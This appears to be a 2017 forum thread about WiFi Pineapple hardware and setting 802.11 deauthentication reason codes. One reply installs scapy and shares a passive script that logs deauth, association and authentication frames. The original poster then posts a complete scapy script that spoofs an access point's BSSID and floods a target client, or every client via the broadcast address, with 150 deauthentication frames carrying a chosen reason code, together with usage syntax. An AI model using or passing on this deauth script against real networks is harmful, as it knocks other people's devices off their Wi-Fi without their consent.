ehem Posted March 16, 2017 Share Posted March 16, 2017 Hi - new to WiFi Pineapple - I need to be able to specify the deauthentication reason code. Can this be done? thanks. Quote Link to comment Share on other sites More sharing options...
Just_a_User Posted March 16, 2017 Share Posted March 16, 2017 (edited) On 3/16/2017 at 2:40 AM, ehem said: Hi - new to WiFi Pineapple - I need to be able to specify the de-authentication reason code. Can this be done? thanks. This interested me too so had a look around I didn’t see anything to specify them on the pineapple "/pineapple/modules/PineAP/executable/executable" was the closest I came to finding deauth instructions. - but was able to read them doing the below: - Found a python script that can do it and it only needed small modification to work. Install scapy onto pineapple: - opkg update opkg upgrade tar wget opkg install python tcpdump unzip wget https://github.com/secdev/scapy/archive/v2.4.3rc1.tar.gz tar -xvf v2.4.3rc1.tar.gz cd scapy* python setup.py install cd .. rm -rf scapy* make the authwatch.py - i just used nano and pasted the following into it: - #!/usr/bin/env python ###################################################### # authWatch.py v. 0.1 (Quick, Dirty and Loud) - by TinMan # Place card in monitor mode and set the channel. # If you want channel hopping, run airodump-ng in # another terminal. Will add channel hopping # in the next version. ###################################################### # # Usage: python authWatch.py # import sys from scapy.all import * interface = sys.argv[1] def sniffReq(p): if p.haslayer(Dot11Deauth): # Look for a deauth packet and print the AP BSSID, Client BSSID and the reason for the deauth. print p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]") # Look for an association request packet and print the Station BSSID, Client BSSID, AP info. if p.haslayer(Dot11AssoReq): print p.sprintf("Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]") # Look for an authentication packet and print the Client and AP BSSID if p.haslayer(Dot11Auth): print p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]") print p.sprintf("------------------------------------------------------------------------------------------") sniff(iface=interface,prn=sniffReq) Then to use drop an interface into monitor mode on the channel you wish to watch - example below uses wlan1 and channel 1. airmon-ng start wlan1 1 ***optionally you can run airodump-ng if you want to channel hop, But you will likely miss some packets. To run the authwatch script python authwatch.py wlan1mon I tested this on my Pineapple TETRA and saw when the pineapple deauths clients I get "Reason [unspec]" when I turn off my wifi on my phone I get "Reason [deauth-ST-leaving]". Seems to work. Hope this helps. authwatcher.py scappyinstall.sh Edited April 16, 2019 by Just_a_User 1 Quote Link to comment Share on other sites More sharing options...
ehem Posted March 18, 2017 Author Share Posted March 18, 2017 (edited) thanks for the reply - very helpful - I had no idea you could install scapy on the pineapple. Here is a script I wrote in python using scapy to perform a de-auth with a specific reason code. It takes care of setting the channel, etc... but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is). There are some devices that will behave differently depending on the reason code you send in the de-auth. Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for. https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes import sys from scapy.all import * print "Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>" print "Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153" iw="iwconfig "+sys.argv[3]+" channel "+sys.argv[4] numpackets=150 hitinter = 0.001 print "Setting Channel with "+iw os.system(iw) print "Sending deauth as BSSID "+sys.argv[1]+" to client MAC address "+sys.argv[2]+" on channel "+sys.argv[4] print "On interface "+sys.argv[3] pkt = RadioTap () / Dot11( addr1 = sys.argv[2], addr2 = sys.argv[1], addr3 = sys.argv[1])/ Dot11Deauth(reason= 7) sendp(pkt, iface = sys.argv[3], count = numpackets, inter = hitinter) print "Complete." Edited April 15, 2017 by ehem 2 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.